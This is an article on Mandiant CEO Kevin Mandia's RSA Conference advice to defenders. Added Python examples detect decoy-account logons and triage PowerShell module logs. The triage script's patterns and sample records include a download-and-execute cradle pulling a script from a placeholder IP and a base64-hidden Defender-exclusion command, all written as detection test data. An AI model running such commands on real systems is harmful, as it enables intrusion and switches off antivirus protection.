SAN FRANCISCO — Mandiant CEO Kevin Mandia knows what sets the more defensible and prepared organizations apart from the rest.
The Google-owned incident response firm, which Mandia founded, investigated 1,163 intrusions in 2022 and is currently responding to more than 100 breaches. Across those engagements, the same fundamental mistakes, oversights and misaligned priorities keep showing up.
“There was a time in my career where if you got hacked and ransomware was deployed, the stigma was you’re not that good at defense. What did you do wrong?” Mandia said Wednesday in a packed Moscone Center keynote hall at the RSA Conference.
There are clear steps organizations can take beyond common safeguards and security tools to strengthen their defenses and increase their chances of detecting, thwarting or minimizing attacks, Mandia said.
Mandia laid out seven pieces of advice to help organizations avoid some of the attacks that might require engagement with Mandiant or other incident response firms.
1. Mine institutional knowledge
“Don’t ever forget the advantage you do have. You should know more about your business, your systems, your topology, your infrastructure than any attacker does,” Mandia said.
With proper structure and an established baseline for normal activities and operations, organizations can detect anomalies faster, Mandia said.
2. Lean on multifactor authentication
“The biggest bang for the buck against any impactful attack is multifactor authentication period,” Mandia said. “Figuring out a way to get it everywhere and know that you have it everywhere with some sort of validation is critical.”
3. Build honeypots
Honeypots, in the form Mandia described, are decoy accounts that are created and then deliberately left untouched by authorized users, so that any use of them is a high-fidelity sign of an intruder. They are effective at helping organizations detect intrusions or malicious activity that security products cannot stop, Mandia said.
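The detection side of that advice, as an added example that is not from the article and not a Mandiant tool: a small rule that raises an alert for any authentication event, successful or failed, whose target is a decoy account. The decoy names, the JSON-export field names and the sample events are constructed for illustration.

```python
"""Alert on any use of decoy ("honey") accounts.

Added example, not from the article and not a Mandiant tool. The decoy
account names, the event field names and the sample records are all
constructed for illustration.
"""
import json
from typing import Iterable

# Constructed decoys: plausible names, never issued to a person, never wired
# into automation. Any authentication against them is an alert.
HONEY_ACCOUNTS = {"svc-backup-legacy", "helpdesk-admin2", "j.doe.archive"}

# Windows Security log IDs covering interactive/network logon (4624/4625),
# Kerberos TGT request and pre-auth failure (4768/4771) and NTLM (4776).
AUTH_EVENT_IDS = {4624, 4625, 4768, 4771, 4776}


def normalize_account(name: str) -> str:
    """Drop a DOMAIN\\ prefix or @domain suffix and lower-case, so that
    'CORP\\Svc-Backup-Legacy' and 'svc-backup-legacy@corp.example' compare equal."""
    name = name.rsplit("\\", 1)[-1]
    name = name.split("@", 1)[0]
    return name.lower()


def honey_account_hits(events: Iterable[dict]) -> list[dict]:
    """Return one alert per authentication event whose target is a decoy account.

    Events are dicts with 'EventID', 'TargetUserName', 'IpAddress', 'Computer'
    and 'TimeCreated' (JSON-export style field names; an assumption).
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") not in AUTH_EVENT_IDS:
            continue
        account = normalize_account(ev.get("TargetUserName") or "")
        if account in HONEY_ACCOUNTS:
            alerts.append({
                "time": ev.get("TimeCreated"),
                "account": account,
                "event_id": ev["EventID"],
                "source_ip": ev.get("IpAddress", "-"),
                "host": ev.get("Computer", "-"),
                "outcome": "failure" if ev["EventID"] in (4625, 4771) else "success/request",
            })
    return alerts


def parse_jsonl(text: str) -> list[dict]:
    """Parse a JSON-lines export, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample export: records 2 and 4 should fire, the rest are ordinary.
SAMPLE_EVENTS = """\
{"TimeCreated": "2023-04-26T09:00:01Z", "EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.12", "Computer": "WS01"}
{"TimeCreated": "2023-04-26T09:02:44Z", "EventID": 4625, "TargetUserName": "CORP\\\\svc-backup-legacy", "IpAddress": "10.0.5.77", "Computer": "DC01"}
{"TimeCreated": "2023-04-26T09:03:10Z", "EventID": 4624, "TargetUserName": "bob", "IpAddress": "10.0.0.40", "Computer": "WS02"}
{"TimeCreated": "2023-04-26T09:03:12Z", "EventID": 4768, "TargetUserName": "HELPDESK-ADMIN2@corp.example", "IpAddress": "::ffff:10.0.5.77", "Computer": "DC01"}
{"TimeCreated": "2023-04-26T09:05:30Z", "EventID": 4776, "TargetUserName": "carol", "IpAddress": "10.0.0.41", "Computer": "DC01"}
"""

if __name__ == "__main__":
    for alert in honey_account_hits(parse_jsonl(SAMPLE_EVENTS)):
        print(alert)
```

Because the decoy is never used legitimately there is no tuning: every hit is worth a look, and the source address of a failed attempt against one decoy is often the first lead on the foothold.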
4. Study module logging
Malicious PowerShell scripts are involved in the second stage of almost every breach Mandiant responds to, according to Mandia. To tell good scripts from bad ones, he advises defenders to turn on PowerShell module logging and study its output, which gives consistent visibility into PowerShell use across the organization's infrastructure.
Organizations must keep a close eye on all identity use, Mandia said.
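What "studying" module logging can look like in practice, as an added example that is not from the article and not a Mandiant tool: a triage pass over PowerShell module-logging records (Event ID 4103) that scores each record against behaviours common in second-stage tooling, decodes any embedded base64 so that encoding cannot hide those behaviours, and separately flags cmdlets a user has never run according to the organization's own baseline. The field names, indicator list, weights and sample records are constructed assumptions.

```python
"""Triage PowerShell module-logging records (Event ID 4103).

Added example, not from the article and not a Mandiant tool. Field names,
indicators, weights and sample events are constructed for illustration.
"""
import base64
import re
from typing import Iterable

# Behaviours rare in legitimate administration but common in second-stage
# tooling. Weights are assumptions, not a published scale.
INDICATORS = [
    (re.compile(r"\b(Invoke-Expression|IEX)\b", re.I), 3, "dynamic code execution"),
    (re.compile(r"Download(String|File)|Invoke-WebRequest|Start-BitsTransfer", re.I), 3, "download cradle"),
    (re.compile(r"FromBase64String|-e(nc|ncodedcommand)?\b", re.I), 2, "base64/encoded command"),
    (re.compile(r"-(ExecutionPolicy|ep)\s+Bypass|-(WindowStyle|w)\s+Hidden", re.I), 2, "evasion switch"),
    (re.compile(r"(Add|Set)-MpPreference", re.I), 4, "Defender tampering"),
    (re.compile(r"Invoke-Mimikatz|\blsass\b", re.I), 5, "credential access"),
]
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CMDLET_RE = re.compile(r"CommandInvocation\(([^)]+)\)")


def _looks_like_text(s: str) -> bool:
    """Printable and mostly ASCII; rejects the noise from reading UTF-8 bytes as UTF-16."""
    if not s or not all(c.isprintable() or c in "\r\n\t" for c in s):
        return False
    return sum(ord(c) < 128 for c in s) / len(s) > 0.9


def decode_base64_blobs(text: str) -> list[str]:
    """Decode long base64 runs in a payload. UTF-16LE is tried first because that
    is what -EncodedCommand and [Text.Encoding]::Unicode produce."""
    decoded = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(s):
                decoded.append(s)
                break
    return decoded


def triage_event(ev: dict) -> dict:
    """Score one record; indicators are searched in the raw payload and in every
    decoded base64 blob, so encoding does not hide them."""
    payload = ev.get("Payload", "")
    decoded = decode_base64_blobs(payload)
    matched = {}
    for text in [payload, *decoded]:
        for rx, weight, label in INDICATORS:
            if rx.search(text):
                matched[label] = weight
    cmd = CMDLET_RE.search(payload)
    return {"user": ev.get("User", "-"), "host": ev.get("Computer", "-"),
            "cmdlet": cmd.group(1) if cmd else None, "score": sum(matched.values()),
            "indicators": sorted(matched), "decoded": decoded}


def triage(events: Iterable[dict], threshold: int = 5) -> list[dict]:
    """Records at or above the threshold, highest score first."""
    scored = [triage_event(ev) for ev in events]
    return sorted((r for r in scored if r["score"] >= threshold), key=lambda r: -r["score"])


def outside_baseline(events: Iterable[dict], baseline: set[str]) -> set[tuple[str, str]]:
    """(user, cmdlet) pairs not in the organization's own baseline of normal cmdlet use."""
    pairs = set()
    for ev in events:
        m = CMDLET_RE.search(ev.get("Payload", ""))
        if m and m.group(1) not in baseline:
            pairs.add((ev.get("User", "-"), m.group(1)))
    return pairs


# Constructed sample records in the shape of the 4103 message body.
_HIDDEN = base64.b64encode("Add-MpPreference -ExclusionPath C:\\Users\\Public".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "Computer": "WS01",
     "Payload": 'CommandInvocation(Get-Service): "Get-Service"\n'
                'ParameterBinding(Get-Service): name="Name"; value="Spooler"'},
    {"User": "CORP\\bob", "Computer": "WS02",
     "Payload": 'CommandInvocation(Invoke-Expression): "Invoke-Expression"\n'
                'ParameterBinding(Invoke-Expression): name="Command"; '
                'value="(New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/a.ps1\')"'},
    {"User": "CORP\\bob", "Computer": "WS02",
     "Payload": 'CommandInvocation(Invoke-Expression): "Invoke-Expression"\n'
                'ParameterBinding(Invoke-Expression): name="Command"; '
                f'value="[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\'{_HIDDEN}\'))"'},
]
BASELINE_CMDLETS = {"Get-Service", "Get-ChildItem", "Get-Process", "Restart-Service"}

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["score"], r["user"], r["indicators"], r["decoded"])
    print(outside_baseline(SAMPLE_EVENTS, BASELINE_CMDLETS))
```

The third sample record shows why decoding matters: on the raw text it only scores for Invoke-Expression and FromBase64String, but the decoded blob reveals a Defender exclusion being added, which is what pushes it to the top of the queue. The baseline check is the "know your environment" half of the advice: a cmdlet that has never appeared in your own module logs deserves a look even when it matches no indicator.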
5. Report risks consistently
The most secure organizations have executives who report risk to boards in a consistent way, Mandia said. This means repeating the same framing when necessary rather than presenting wildly divergent risk assessments from one board meeting to the next.
6. Identify assets of importance
Security professionals should know the assets that matter most to an organization, and regularly gauge the potential risks confronting those assets, Mandia said.
Mandia recommended defenders take this a step further, by engaging in tabletop exercises involving the risks that cause the most worry and potential damage to the organization.
7. Collaborate, and listen
Building on the theme of RSA Conference, "Stronger Together," Mandia said businesses should regularly participate in a community of their choosing to keep defenders engaged. By sharing and learning from other organizations' security operations, cybersecurity professionals can bolster their own organization's defenses.